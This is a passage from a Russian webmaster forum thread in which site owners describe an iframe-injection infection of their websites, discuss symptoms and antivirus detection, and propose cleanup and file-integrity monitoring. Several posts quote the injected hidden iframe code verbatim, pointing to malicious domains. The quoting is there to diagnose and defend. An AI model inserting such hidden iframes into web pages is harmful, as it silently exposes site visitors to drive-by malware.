Опасная инъекция в сайты от mdfc.info - у меня заразились все 30 сайтов!

K
На сайте с 24.03.2004
Offline
223
#161
Maximus325:
Верно, зайдите на мазафаку и любой подобный форум там так же как у нас продаётся всё начиная от самого скрипта и компиляции, заканчивая тыренными логами.
А вышеуказанный домен, это домен одной широкоизвестной в узких кругах партнёрки по инсталам.

и еще там оптимизаторов куча есть, которые трафик дурвейный на инсталы продают.

проверенная ддос защита (http://ddos-protection.ru) -> http://ddos-protection.ru (http://ddos-protection.ru), бесплатный тест, цена от размера атаки не зависит.
B7
На сайте с 07.10.2005
Offline
47
#162
sb1982:
Колпин:
Касперским и обнаружил. Вот как он распространяется на чужих сайтах:
<IFRAME SRC="http://www.vevdqimkcm.info/c/1881/counter21.php" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>


везде где можно понавешали уже ;-((

У меня в замененные index файлы всех сайтов был прописан несколько иной код
<!-- ~ --><iframe src='http://visitsell.info/moto/index.php' width='1' height='1'></iframe>

<iframe src='http://amedserv.narod.ru/index.html' width='1' height='1'></iframe><!-- ~ -->

После захода на мои сайты ругался NOD 32, но уже ничего не помогало, только работала кнопка RESET, даже после перезагрузки. По глупости и со второго компа зашел на свой сайт. :) Итог - 2 мертвых операционных системы.
Продам ссылки с морд строительных сайтов ICQ 300-513-472 Форум любителей компьютерных и консольных игр (http://www.mygame.net.ru/)
W
На сайте с 30.07.2006
Offline
55
#163

Help!

вот и я поймал эту гадость, правда на моих сайтах немного другая ситуация: при просмотре с других машин в коде этой гадости нет, а с моего компа грузится чистая страница которая содержит этот iframe, и больше ничего. Nod32 ничего подозрительного не находит

F
На сайте с 03.10.2006
Offline
160
#164

А как такое может быть, что при просмотре с других машин нет ифрэйма? Интересно...

На счёт Нода - он действительно не видит этот вирус, это многие писали.

W
На сайте с 30.07.2006
Offline
55
#165
furamag:
А как такое может быть, что при просмотре с других машин нет ифрэйма? Интересно...
На счёт Нода - он действительно не видит этот вирус, это многие писали.

Сам никак не пойму, хрень какая-то, в firefox грузится чистая страничка только с этим фреймом, в IE7 все также + предлагает установить элемент активХ

попросил в аське у нескольких человек проверить сайты, у них все грузится нормально...

Добавлено: еще заметил такую вещь, если сайты запускать с www, то грузятся нормально, если без - то со фреймом, некоторые - наооборот

MoMM
На сайте с 16.06.2006
Offline
727
#166
webmastak:
Nod32 ничего подозрительного не находит

попробуйте перезагрузиться в безопасном, запустите нод в ручную и просканируйтесь

возможно, кстати, что внедрение произошло недавно (не обязательно на вашу машину) и на других машинах виден старый сайт из кэша

W
На сайте с 30.07.2006
Offline
55
#167
MoMM:
попробуйте перезагрузиться в безопасном, запустите нод в ручную и просканируйтесь

так и делал, все чисто + еще проверил ad-awarом - тоже чисто

P2
На сайте с 01.08.2007
Offline
0
#168

Всем привет!

У меня появилась мысль как можно бороться с этим вирусом...

Мне кажется что для разработчика сайта не составит труда написать небольшой скрипт (к примеру на пхп) который изначально бы прошарил все папки и сохранил копии всех документов (*.php, *.html и тд.) в какой то файл или в базу SQL...

В последствии при запуске этого скрипта будет проверяться произошли ли изменения, и если произошли то содержимое файлов меняется на сохраненные ранее...

Если нужно самому внести изменения, то обновить данные в файле или базе.

На моем хостинге есть выполнение заданий по расписанию(не знаю как на других хостингах). С помощью этого можно сделать чтоб сайт регляно проверялся на наличие изменений. Если такой функции хостинг не предоставляет, то можно самому делать такую проверку, или поместить упрощеный скрипт проверки на страницы вашего сайта(чтоб страница сама себя проверяла на изменения). таким образом при посещении клиентом вашего сайта будет происходить проверка...(конечно это может немного замедлит работу вашего сайта, а если ваш сайт на htmlе то этот вариант отпадает)

Еще думаю нужно сделать чтоб скрипт вел журнал.. когда какие изменения происходили, чтоб вы знали об атаках..

Все это не защитит ваш копьютер, но сайты остануться целыми и не будут распространять этот вирус.

Сам я еще не пробовал реализовать такую защиту, но думаю это можно сделать. В ближайшее время может попробую это сделать.

может я конечно что то не учел, если что поправьте меня:)

Russian
На сайте с 10.12.2005
Offline
69
#169

звучит логично, но на самом деле это борьба с ветряными мельницами, надо искоренять причину, а не соревноваться с вирусом кто первый устанет править файлы и кто круче. Все известные антивирусные ПО уже знают этот вирь в лицо. Лечим свой компьютер, затем меняем пароль на фтп. Вычищаем все на сервере. Далее думаем кому нужен доступ кроме нас (межет быть персонал), провеяем их машины, выдаем новые пароли. Если человек работает в интернете, они должен понимать что без антивирусного ПО никуда. Если оно есть, то одноразовая чистка и смена паролей, вот и все что нужно сделать.

cscope
На сайте с 13.02.2005
Offline
525
#170

Сам ловил подобный троян 😒

Приходилось систему заново переустанавливать.

Через ie и симантек вирус проникает на локальный компьютер как нож сквозь масло.

Даже не нужно ничего качать,просто зашел на такой зараженный сайт и все.

Вот рекомендую хороший бесплатный антивирус с проактивной защитой от подобных вирусов.

Так же рекомендую установить интернет обозреватель Опера.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий